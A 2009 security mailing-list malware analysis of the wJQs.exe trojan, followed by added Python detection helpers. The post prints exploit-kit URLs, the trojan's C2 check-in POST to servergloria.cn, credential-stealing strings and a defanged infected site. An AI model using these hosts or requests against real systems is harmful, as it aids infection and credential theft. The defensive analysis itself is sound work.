[nsp-sec] wJQs.exe Trick of the Day

Brian Eckman eckman at umn.edu
Thu Apr 9 21:54:48 EDT 2009


Quick moral of the story:
Look for the following...

  * ~ 280 KB downloads from 209.160.21.79:80/tcp
  * Steady TCP traffic to/from 209.160.21.79:443/tcp
  * DNS query for servergloria.cn


wJQs.exe, as downloaded from

GET /bb/?h=2
Host: 60.29.232.31
(via Flash exploit)

or

GET
/bb/?h=5ae0cgi?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
Host: 60.29.232.31
(via PDF exploit - the h=stuff will likely be somewhat random)

(SOOPER SEEKRIT HINT: the "h=" after the ? means the PDF and/or Flash
exploit *worked*, and is triggering the Trojan download. If you see URLs
like GET /bb/?t=2 or GET /bb/?t=3 or just GET /bb/?<lots of hex> ...
those are the checks leading up to the exploit code, and/or the PDF or
SWF exploit code download itself - not a sign of infection....)

Here's an example of an infected site that you can visit with a downrev
version of Acrobat Reader and/or Flash Player to infect a machine of
your choice:

MALICIOUS!!! ->  hXXp://www.thememoryhole(dot)org/   <- MALICIOUS!!!

============ WICKED DOWNLOAD TROJAN =====================
The file that was subsequently downloaded:

  * 281,600 bytes
  * From 209.160.21.79:80/tcp (and it was NOT HTTP)
  * MD5: 2f5d2ec29a8ce10544d92b269124c0da
  * http://www.virustotal.com/analisis/eee90fe77cec1ba99b654b8875836409

Infected hosts then start making very odd, consistent traffic to
209.160.21.79:443/tcp - with a *very* unusual payload. It consists of
many 0x00s, with some non-ASCII bytes tossed in every now and then.
Trust me - this isn't some wacko P2P thingy downloading movies, it's EVIL.

(Actually, a _few_ strings within it make it look kind of like some
wacko P2P thingy distributing warez, as you'll see below, but I digress...)

Get this: Here's the start of a TCP conversation between a host infected
with wJQs.exe (above), and 209.160.21.79:80/tcp: (we'll name the
infected host "10.10.10.10")

10.10.10.10:1029 -> 209.160.21.79:80  SYN (48 bytes - no data)
209.160.21.79:80 -> 10.10.10.10:1029 SYN/ACK (48 bytes - no data)
10.10.10.10:1029 -> 209.160.21.79:80  ACK  (46 bytes - 6 data)[1]
10.10.10.10:1029 -> 209.160.21.79:80 PSH/ACK  (46 bytes - 6 data)[2]
209.160.21.79:80 -> 10.10.10.10:1029 ACK (46 bytes - 6 data)[3]
10.10.10.10:1029 -> 209.160.21.79:80 PSH/ACK  (48 bytes - 8 data)[4]
209.160.21.79:80 -> 10.10.10.10:1029 PSH/ACK (46 bytes - 6 data)[5]
209.160.21.79:80 -> 10.10.10.10:1029 PSH/ACK (1500 bytes)[6]


"Data" here simply meaning bytes after the TCP Header (displayed below
in hex)
[1]: 00 00 00 00 00 00
[2]: C8 00 00 00 00 00
[3]: 00 00 00 00 00 00
[4]: 07 46 34 35 36 37 37 33
[5]: 00 4c 04 00 00 00

[6]: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00
0010 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00
0040 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90
0050 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73
0060 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57
0070 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00
<snip>

4d 5a is MZ...  This is the first of the download of the 281,600 bytes
Trojan.

This Trojan is saved as a .DLL in C:\WINDOWS\system32\ (assuming the
user account that is logged in is an administrator). I don't have more
info right now - I'm just trying to send this off so I can go home!

------------------------------
  Fun strings inside the .dll:
------------------------------
<input type=hidden name="aslkjqwpoe123">
Login:
Password:
RunCommand
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UIHost
SeDebugPrivilege
HTTPS
LocationURL
Screen: Full
Key Logs Data:
Name:
Key:
Computer Information: I am Installed
CPUSpeed:
Total Ram:
OS:
Computer Name:
User Name:
Protected:
Software\Microsoft\Internet Account Manager\Accounts
Software\Microsoft\Internet Account Manager\Accounts\POP3 Server
Account Name:
Password:
POP3 Server:
POP3 User Name:
SMTP Display Name:
SMTP Email Address:
SMTP Server:

(YOU LISTENING SALUSKY?!!??!?!)
(no, that wasn't a string in the binary. But it should have been!)


Some part of the infection caused this to happen as well:

POST /dns/in.php?i=PM4BAP6XGG40G2iHathciTH5S1480G0A90T0&o=2 HTTP/1.0
Host: servergloria.cn

I've been calling this "Zbot". I'm probably wrong, but oh well...

I guarantee you this is widespread. Oh yeah, and none of this triggered
our Snort rules.

Cheers,
Brian
-- 
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
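As an added example that is not part of the post (and not from any IDS or vendor), here is a small Python helper set that turns the indicators above into checks a defender could run over their own data: classifying the /bb/?t= vs /bb/?h= requests and the servergloria.cn check-in from proxy-log lines, flagging flow records against the "quick moral" indicators, and parsing the non-HTTP exchange on 209.160.21.79:80 to confirm an MZ/PE image arriving with no HTTP framing. The proxy-log and flow-record formats are constructed for this example; the byte strings are transcribed from the hex dumps in the post. Reading the second server frame (00 4c 04 00 00 00) as a little-endian uint32 file length is my own assumption, not something the post states, though the arithmetic happens to give 0x44c00 = 281,600, the dropped file's size.

```python
"""Detection helpers for the wJQs.exe indicators in Brian Eckman's post.

Illustrative code added to this page, not anything from the post or from
any product. Log/flow formats are constructed; byte strings are transcribed
from the post's hex dumps.
"""
import re
import struct

# Indicators quoted from the post.
EXPLOIT_HOST = "60.29.232.31"   # serves the /bb/ checks, the PDF/SWF exploits and the ?h= fetch
DROP_HOST = "209.160.21.79"     # non-HTTP download on 80/tcp, odd steady traffic on 443/tcp
C2_DOMAIN = "servergloria.cn"   # POST /dns/in.php?i=...&o=2 check-in
TROJAN_SIZE = 281_600           # bytes of the dropped .DLL
DOS_STUB = b"This program must be run under Win32"

# Constructed proxy-log line format: "<src-ip> <method> <host> <path> <bytes>"
LOG_RE = re.compile(r"^(?P<src>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) (?P<bytes>\d+)$")


def classify_request(line):
    """Map one proxy-log line to an infection stage, or None if unrelated."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, path = m["host"], m["path"]
    if host == EXPLOIT_HOST and path.startswith("/bb/?"):
        # "?h=" is only requested after the PDF/Flash exploit ran (the trojan fetch);
        # "?t=" and bare-hex query strings are the checks leading up to it.
        return "trojan-fetch" if path[5:].startswith("h=") else "pre-exploit-check"
    if host == C2_DOMAIN and path.startswith("/dns/in.php"):
        return "c2-checkin"
    return None


def flag_flow(src, dst, dport, nbytes, tolerance=0.05):
    """Flag one flow record against the 'quick moral' indicators; None if clean.

    The post says '~280 KB', so the size window is +/-5% around 281,600 (my choice).
    """
    if dst != DROP_HOST:
        return None
    if dport == 80 and abs(nbytes - TROJAN_SIZE) <= TROJAN_SIZE * tolerance:
        return "trojan-download-size"
    if dport == 443:
        return "c2-443-traffic"
    return None


def parse_drop_handshake(client_bytes, server_bytes):
    """Decode the non-HTTP exchange on 209.160.21.79:80 reproduced in the post.

    Frame layout inferred from the capture (an assumption, not a documented
    protocol): client sends six zero bytes, then C8 00 00 00 00 00, then a
    length-prefixed ASCII tag; server answers six zero bytes, then a 6-byte
    frame whose first four bytes read as a little-endian uint32 length,
    then the raw PE image. Returns a dict, or None if the stream doesn't match.
    """
    if client_bytes[:12] != b"\x00" * 6 + b"\xc8\x00\x00\x00\x00\x00":
        return None
    tag_len = client_bytes[12]
    tag = client_bytes[13:13 + tag_len].decode("ascii", "replace")
    if len(server_bytes) < 12 or server_bytes[:6] != b"\x00" * 6:
        return None
    announced_len = struct.unpack_from("<I", server_bytes, 6)[0]
    body = server_bytes[12:]
    return {
        "tag": tag,
        "announced_len": announced_len,
        "size_matches_trojan": announced_len == TROJAN_SIZE,
        # A PE image on port 80 with no HTTP request/response framing is the core tell.
        "pe_image": body[:2] == b"MZ" and DOS_STUB in body[:0x80],
    }


# Constructed reassembly of packets [1]-[6] from the post (only the 0x80 bytes shown).
CLIENT_STREAM = bytes.fromhex("000000000000" "c80000000000" "0746343536373733")
SERVER_STREAM = bytes.fromhex("000000000000" "004c04000000") + bytes.fromhex(
    "4d5a50000200000004000f00ffff0000" "b80000000000000040001a0000000000"
    "00000000000000000000000000000000" "00000000000000000000000000010000"
    "ba10000e1fb409cd21b8014ccd219090" "546869732070726f6772616d206d7573"
    "742062652072756e20756e6465722057" "696e33320d0a24370000000000000000"
)

# Constructed proxy-log lines mirroring the requests quoted in the post.
SAMPLE_LOG = [
    "10.10.10.10 GET 60.29.232.31 /bb/?t=2 512",
    "10.10.10.10 GET 60.29.232.31 /bb/?h=2 1024",
    "10.10.10.10 POST servergloria.cn /dns/in.php?i=PM4BAP6XGG40G2iHathciTH5S1480G0A90T0&o=2 0",
    "10.10.10.11 GET www.example.com /index.html 2048",
]


def scan_log(lines):
    """Return (src, stage) for every line that matches an infection stage."""
    hits = []
    for line in lines:
        stage = classify_request(line)
        if stage:
            hits.append((line.split()[0], stage))
    return hits


if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
    print(flag_flow("10.10.10.10", DROP_HOST, 80, 281_600))
    print(parse_drop_handshake(CLIENT_STREAM, SERVER_STREAM))
```

The handshake parser is the piece worth keeping even once the IPs rotate: a stream to port 80 that opens with zero-byte frames instead of a request line and then carries "MZ" plus the DOS stub is anomalous regardless of the destination address, whereas the host and domain constants will go stale.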